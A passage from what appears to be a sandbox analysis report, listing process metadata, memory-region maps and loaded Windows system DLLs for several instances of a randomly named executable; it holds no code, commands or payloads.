region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 5232 start_va = 0x790000 end_va = 0x917fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000790000" filename = "" Region: id = 5233 start_va = 0x77150000 end_va = 0x7717afff monitored = 0 entry_point = 0x77155680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Thread: id = 132 os_tid = 0xa50 Thread: id = 146 os_tid = 0xa0c Thread: id = 184 os_tid = 0xa50 Process: id = "42" image_name = "-zetrxylspxh.exe" filename = "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe" page_root = "0xd03c000" os_pid = "0xa8c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x664" cmd_line = "\"C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4328 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 4329 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 4330 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 4331 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 4332 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 4333 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 4334 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4335 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 4336 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 4337 start_va = 0x400000 end_va = 0x437fff monitored = 1 entry_point = 0x40312a region_type = mapped_file name = "-zetrxylspxh.exe" filename = "\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe" (normalized: "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe") Region: id = 4338 start_va = 0x77260000 end_va = 0x773dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 4339 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 4340 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4341 start_va = 0x7fff0000 end_va = 0x7ffc5f80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 4342 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4343 start_va = 0x7ffc5f9d1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffc5f9d1000" filename = "" Region: id = 4737 start_va = 0x1d0000 end_va = 0x1dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 4738 start_va = 0x62ee0000 end_va = 0x62f2ffff monitored = 0 entry_point = 0x62ef8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 4739 start_va = 0x62f30000 end_va = 0x62fa9fff monitored = 0 entry_point = 0x62f43290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 4740 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4741 start_va = 0x62fb0000 end_va = 0x62fb7fff monitored = 0 entry_point = 0x62fb17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 4742 start_va = 0x440000 end_va = 0x66ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 4743 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4744 start_va = 0x76c20000 end_va = 0x76d9dfff monitored = 0 entry_point = 0x76cd1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 5244 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 5245 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 5246 start_va = 0x440000 end_va = 0x4fdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5247 start_va = 0x570000 end_va = 0x66ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 5248 start_va = 0x76300000 end_va = 0x76446fff monitored = 0 entry_point = 0x76311cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 5249 start_va = 0x76010000 end_va = 0x7615efff monitored = 0 entry_point = 0x760c6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 5250 start_va = 0x500000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 5251 start_va = 0x670000 end_va = 0x76ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000670000" filename = "" Region: id = 5252 start_va = 0x74a90000 end_va = 0x75e8efff monitored = 0 entry_point = 0x74c4b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 5253 start_va = 0x74290000 end_va = 0x7434dfff monitored = 0 entry_point = 0x742c5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 5254 start_va = 0x76fb0000 end_va = 0x76fe6fff monitored = 0 entry_point = 0x76fb3b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 5255 start_va = 0x764b0000 end_va = 0x769a8fff monitored = 0 entry_point = 0x766b7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 5256 start_va = 0x76da0000 end_va = 0x76f5cfff monitored = 0 entry_point = 0x76e82a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 5257 start_va = 0x75f60000 end_va = 0x7600cfff monitored = 0 entry_point = 0x75f74f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 5258 start_va = 0x73f90000 end_va = 0x73fadfff monitored = 0 entry_point = 0x73f9b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 5259 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5260 start_va = 0x73f80000 end_va = 0x73f89fff monitored = 0 entry_point = 0x73f82a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 5261 start_va = 0x75ef0000 end_va = 0x75f47fff monitored = 0 entry_point = 0x75f325c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 5262 start_va = 0x74a40000 end_va = 0x74a83fff monitored = 0 entry_point = 0x74a59d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 5263 start_va = 0x76a90000 end_va = 0x76b0afff monitored = 0 entry_point = 0x76aae970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 5264 start_va = 0x76f60000 end_va = 0x76fa4fff monitored = 0 entry_point = 0x76f7de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 5265 start_va = 0x74350000 end_va = 0x7435bfff monitored = 0 entry_point = 0x74353930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 5266 start_va = 0x77180000 end_va = 0x7720cfff monitored = 0 entry_point = 0x771c9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 5267 start_va = 0x77210000 end_va = 0x77253fff monitored = 0 entry_point = 0x77217410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 5268 start_va = 0x75f50000 end_va = 0x75f5efff monitored = 0 entry_point = 0x75f52e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 5600 start_va = 0x770000 end_va = 0x7affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000770000" filename = "" Region: id = 5601 start_va = 0x7b0000 end_va = 0x8affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007b0000" filename = "" Region: id = 5602 start_va = 0x76b10000 end_va = 0x76bfafff monitored = 0 entry_point = 0x76b4d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 5603 start_va = 0x6c540000 end_va = 0x6c5d1fff monitored = 0 entry_point = 0x6c54dd60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 5604 start_va = 0x540000 end_va = 0x569fff monitored = 0 entry_point = 0x545680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 5605 start_va = 0x8b0000 end_va = 0xa37fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008b0000" filename = "" Region: id = 5606 start_va = 0x77150000 end_va = 0x7717afff monitored = 0 entry_point = 0x77155680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Thread: id = 133 os_tid = 0x6f4 Thread: id = 168 os_tid = 0x308 Thread: id = 186 os_tid = 0x100c Process: id = "43" image_name = "-zetrxylspxh.exe" filename = "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe" page_root = "0xd146000" os_pid = "0xaf4" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x664" cmd_line = "\"C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4366 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 4367 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 4368 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 4369 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 4370 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 4371 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 4372 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4373 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 4374 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 4375 start_va = 0x400000 end_va = 0x437fff monitored = 1 entry_point = 0x40312a region_type = mapped_file name = "-zetrxylspxh.exe" filename = "\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe" (normalized: "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe") Region: id = 4376 start_va = 0x77260000 end_va = 0x773dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 4377 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 4378 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 4379 start_va = 0x7fff0000 end_va = 0x7ffc5f80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 4380 start_va = 0x7ffc5f810000 end_va = 0x7ffc5f9d0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 4381 start_va = 0x7ffc5f9d1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffc5f9d1000" filename = "" Region: id = 4749 start_va = 0x440000 end_va = 0x63ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 4750 start_va = 0x62ee0000 end_va = 0x62f2ffff monitored = 0 entry_point = 0x62ef8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 4751 start_va = 0x62f30000 end_va = 0x62fa9fff monitored = 0 entry_point = 0x62f43290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 4752 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4753 start_va = 0x62fb0000 end_va = 0x62fb7fff monitored = 0 entry_point = 0x62fb17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 4754 start_va = 0x440000 end_va = 0x56ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 4755 start_va = 0x630000 end_va = 0x63ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 4756 start_va = 0x74530000 end_va = 0x7460ffff monitored = 0 entry_point = 0x74543980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 4757 start_va = 0x76c20000 end_va = 0x76d9dfff monitored = 0 entry_point = 0x76cd1b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 5269 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 5270 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 5271 start_va = 0x570000 end_va = 0x62dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5272 start_va = 0x76300000 end_va = 0x76446fff monitored = 0 entry_point = 0x76311cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 5273 start_va = 0x76010000 end_va = 0x7615efff monitored = 0 entry_point = 0x760c6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 5274 start_va = 0x640000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 5275 start_va = 0x680000 end_va = 0x77ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000680000" filename = "" Region: id = 5276 start_va = 0x74a90000 end_va = 0x75e8efff monitored = 0 entry_point = 0x74c4b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 5277 start_va = 0x74290000 end_va = 0x7434dfff monitored = 0 entry_point = 0x742c5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 5278 start_va = 0x76fb0000 end_va = 0x76fe6fff monitored = 0 entry_point = 0x76fb3b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 5279 start_va = 0x764b0000 end_va = 0x769a8fff monitored = 0 entry_point = 0x766b7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 5280 start_va = 0x76da0000 end_va = 0x76f5cfff monitored = 0 entry_point = 0x76e82a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 5281 start_va = 0x75f60000 end_va = 0x7600cfff monitored = 0 entry_point = 0x75f74f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 5282 start_va = 0x73f90000 end_va = 0x73fadfff monitored = 0 entry_point = 0x73f9b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 5283 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5284 start_va = 0x73f80000 end_va = 0x73f89fff monitored = 0 entry_point = 0x73f82a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 5285 start_va = 0x75ef0000 end_va = 0x75f47fff monitored = 0 entry_point = 0x75f325c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 5286 start_va = 0x74a40000 end_va = 0x74a83fff monitored = 0 entry_point = 0x74a59d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 5287 start_va = 0x76a90000 end_va = 0x76b0afff monitored = 0 entry_point = 0x76aae970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 5288 start_va = 0x76f60000 end_va = 0x76fa4fff monitored = 0 entry_point = 0x76f7de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 5289 start_va = 0x74350000 end_va = 0x7435bfff monitored = 0 entry_point = 0x74353930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 5290 start_va = 0x77180000 end_va = 0x7720cfff monitored = 0 entry_point = 0x771c9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 5291 start_va = 0x77210000 end_va = 0x77253fff monitored = 0 entry_point = 0x77217410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 5607 start_va = 0x780000 end_va = 0x7bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000780000" filename = "" Region: id = 5608 start_va = 0x7c0000 end_va = 0x8bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007c0000" filename = "" Region: id = 5609 start_va = 0x75f50000 end_va = 0x75f5efff monitored = 0 entry_point = 0x75f52e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 5610 start_va = 0x76b10000 end_va = 0x76bfafff monitored = 0 entry_point = 0x76b4d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 5611 start_va = 0x6c540000 end_va = 0x6c5d1fff monitored = 0 entry_point = 0x6c54dd60 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10586.0_none_811bc0006c44242b\\comctl32.dll") Region: id = 5612 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 5613 start_va = 0x8c0000 end_va = 0xa47fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008c0000" filename = "" Region: id = 5614 start_va = 0x77150000 end_va = 0x7717afff monitored = 0 entry_point = 0x77155680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Thread: id = 135 os_tid = 0x578 Thread: id = 158 os_tid = 0xf04 Thread: id = 187 os_tid = 0x66c Process: id = "44" image_name = "-zetrxylspxh.exe" filename = "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe" page_root = "0xd074000" os_pid = "0xf70" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "3" os_parent_pid = "0x664" cmd_line = "\"C:\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd44" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 4390 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 4391 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 4392 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 4393 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 4394 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 4395 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 4396 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 4397 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 4398 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 4399 start_va = 0x400000 end_va = 0x437fff monitored = 1 entry_point = 0x40312a region_type = mapped_file name = "-zetrxylspxh.exe" filename = "\\Program Files (x86)\\Ealwtgnkh\\-zetrxylspxh.exe" (normalized: "c:\\program files (x86)\\ealwtgnkh\\-zetrxylspxh.exe") Region: id = 4400 start_va = 